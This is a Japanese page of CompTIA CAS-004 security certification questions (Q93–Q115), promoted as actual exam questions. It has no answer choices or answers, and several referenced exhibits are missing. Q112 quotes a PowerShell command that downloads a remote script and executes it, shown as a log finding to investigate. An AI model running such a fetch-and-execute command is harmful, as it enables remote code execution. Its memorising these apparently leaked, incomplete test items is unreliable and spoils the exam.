CAS-004の実際の質問の答えPDF 100%カバー実際の試験問題[Q93-Q115]。

Q93. あるアナリストが、インターネットに面したDNSサーバーに対して脆弱性スキャンを実行し、以下のレポートを受け取った：

最も重要な脆弱性を検証するために、アナリストが最初に使用すべきツールはどれか。

Q94. あるアナリストが、セキュリティイベントを調査中に、ユーザが送信元不明の電子メールの添付ファイルを開いた証拠を発見した。ユーザが添付ファイルを開いた直後、サーバ群で大量のネットワークとリソースのアクティビティが発生した。そのサーバーを調査したところ、そのサーバーはランサムウェアによって暗号化されており、48時間以内の支払いを要求していることが判明した。同社はランサムウェアに対する対応策を持っていない。
経営陣に報告した後、アナリストが取るべき次のステップはどれか。

Q95. 情報漏えいの可能性が報告された直後、組織のインシデント対応手順の一環として、セキュリティエンジニアが問題のサーバーのフォレンジックイメージを作成します。このイメージの完全性を確保するために行わなければならないことはどれですか？

Q96. あるセキュリティアーキテクトが、以下の企業ファイアウォールのアーキテクチャと構成案を検討している：

どちらのファイアウォールもステートフルで、レイヤー7のフィルタリングとルーティングを提供する。同社には以下の要件がある：
ウェブサーバーは、企業ネットワークからHTTP/S経由ですべてのアップデートを受け取らなければならない。
ウェブサーバーはインターネットとの通信を開始すべきではない。
ウェブサーバーは、事前に承認された企業データベースサーバーにのみ接続すべきである。
従業員のコンピューティングデバイスは、ポート80と443でのみウェブサービスに接続する必要があります。
すべての要件が最も安全な方法で満たされるようにするために、アーキテクトが推奨すべきは次のうちどれでしょうか。

Q97. 複数の第三者機関を利用してサービスを提供している大手銀行の最高情報責任者（CIO）は、第三者機関による顧客データの取り扱いとセキュリティに懸念を抱いている。このリスクを管理するために、次のうちどれを実施すべきでしょうか？

Q98. 組織は災害復旧と事業継続を計画している。
インストラクション
以下のシナリオと手順を確認してください。各所見を、影響を受けるホストに一致させてください。
シナリオ3を適切なホストに関連付けた後、ホストをクリックして、その発見に対する適切な是正処置を選択する。
各所見は複数回使用することができる。
シミュレーションの初期状態に戻したい場合は、Reset Allボタンをクリックしてください。

Q99. あるセキュリティアナリストが、以下の脆弱性評価報告書をレビューしている：

インターネットに面したホストに対する攻撃を最小限に抑えるために、最初にパッチを当てるべきはどれか。

Q100. ある会社が、ウェブサーバーがライバル会社に侵入されたのではないかと疑っている。セキュリティ・エンジニアがウェブ・サーバーのログを確認したところ、以下のことが判明した：

セキュリティ・エンジニアが開発者と一緒にコードを見ると、次の行が実行されたときにログ・エントリが作成されることがわかる：

会社が実施すべきセキュリティ管理として適切なものはどれか。

Q101. ある会社の従業員は、海外出張中に会社のシステムにアクセスすることが許可されていません。会社の電子メールシステムは、地理的な場所に基づいてログインをブロックするように構成されていますが、一部の従業員は、彼らの携帯電話が旅行中に電子メールを同期し続けると報告しています。次のうち、最も可能性が高いのはどれですか？(2つ選択してください)

Q102. ある企業は、サイバーセキュリティの防御を強化しようとしており、ネットワーク・インフラに焦点を当てています。誤検知によって正当なトラフィックが遮断されないようにするため、このソリューションは同社のサービスの可用性に影響を与えることはできません。
この条件を満たすのは次のうちどれでしょう？

Q103. あるセキュリティ・アナリストが、従業員からセキュリティ・チームに送られた一連の不審な電子メールを調査している。そのメールは、現在のビジネス・パートナーからのものと思われ、画像やURLは含まれていない。同社が使用しているセキュリティ・ツールでは、メッセージから画像やURLは取り除かれておらず、代わりに、メールにはプレーン・テキストで以下の内容だけが含まれている。

セキュリティアナリストが実施すべきことはどれか。

Q104. あるウェブアプリケーションに深刻度の高い脆弱性が発見され、企業に導入された。この脆弱性により、権限のないユーザがオープンソースのライブラリを利用し、特権ユーザ情報を閲覧できる可能性がある。企業はリスクを受け入れたくないが、開発者はすぐに問題を修正できない。
問題が修正されるまでの間、リスクを許容レベルまで低減するために実施すべきことは、次のうちどれでしょうか？

Q105. ある企業のSOCは、特定の脆弱性を利用した活発なキャンペーンに関する脅威情報を受け取った。
同社は、この活発なキャンペーンに対して自社が脆弱かどうかを見極めたいと考えている。
この決断を下すために、会社は次のどれを使うべきか？

Q106. ある監査人が、インシデントの発生源を特定するために、Web アプリケーションのログをレビューしている。ウェブアプリケーションのアーキテクチャには、インターネットからアクセス可能なアプリケーションロードバランサ、プライベートサブネット内の多数のウェブサーバ、アプリケーションサーバ、および階層型構成のデータベースサーバ1台が含まれている。アプリケーションロードバランサはログを保存できない。以下はログのサンプルです：

将来発生するインシデントを発生源まで確実に遡及できるようにするために、監査人が推奨すべきはどれか。

Q107. ある開発者が、ある会社のために新しいモバイルアプリケーションを作成している。このアプリケーションは REST API と TLS 1.2 を使って、外部のバックエンドサーバと安全に通信します。この構成により、同社は HTTPS 傍受攻撃を懸念している。
この種の攻撃に対する最善の解決策はどれか。

Q108. ある脆弱性アナリストが、ある企業の社内開発ソフトウェアにゼロデイ脆弱性を発見した。現在の脆弱性管理システムには、この脆弱性に対するチェック機能がないため、エンジニアがチェック機能の作成を依頼された。
これらの要求を満たすのに最も適しているのはどれか？

Q109. ICSに出力する電力量を伝える制御メッセージに暗号を適用する場合、最も重要なセキュリティ目的はどれか。

Q110. MDMソフトウェアからのデバイス・イベント・ログのソースは以下の通り：

以下のセキュリティ上の懸念と対応策のうち、ログにあるデバイスがもたらすリスクに対処するのに最適なものはどれか。

Q111. あるセキュリティアナリストが、次のような活動を示す多くの SIEM イベントに気づいた：

アナリストが最初に取るべき対応はどれか。

Q112. あるセキュリティアナリストは、外部向けメールサーバーへのログイン試行失敗回数が着実に増加していることに気づいた。ジャンプボックスの1つを調査している間、アナリストはログファイル内の以下を確認した： powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois
次のセキュリティ対策のうち、どれが警告を発し、攻撃の次の段階を防ぐことができただろうか？

Q113. ある企業が、認証情報を詐取するハッカーに繰り返し侵入されている。この企業の最高情報セキュリティ責任者（CISO）は、生体認証やトークン・ベースなど、ユーザーを認証するための複数の管理策を導入した。このような管理策を導入するたびに、オーバーヘッドと複雑さが増しているが、さらなる侵害を食い止めることはできていない。外部のコンサルタントが、認証管理をサポートするために現在実施されているプロセスを評価しています。以下の推奨事項のうち、不正アクセスのリスクを最も低減できるのはどれか。

Q114. 脆弱性評価のエンドポイントから最新の調査結果のレポートが作成された。セキュリティアナリストは、レポートをレビューし、対処すべき項目の優先リストを作成する必要があります。アナリストがリストを迅速に作成するために使用すべきものはどれか。

Q115. ある企業が知的財産を盗難から守りたいと考えている。同社はすでにACLとDACを適用している。
データ盗難を防ぐために、会社は次のうちどれを使うべきか？